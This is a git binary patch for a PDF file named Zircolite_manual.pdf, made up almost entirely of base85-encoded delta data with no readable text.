diff --git a/docs/Zircolite_manual.pdf b/docs/Zircolite_manual.pdf index e4ae9aba955147384a6813345084d4585bdb3456..2dd5492af00fdecae579e424cfff548a904e91c9 100644 GIT binary patch delta 12597 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 
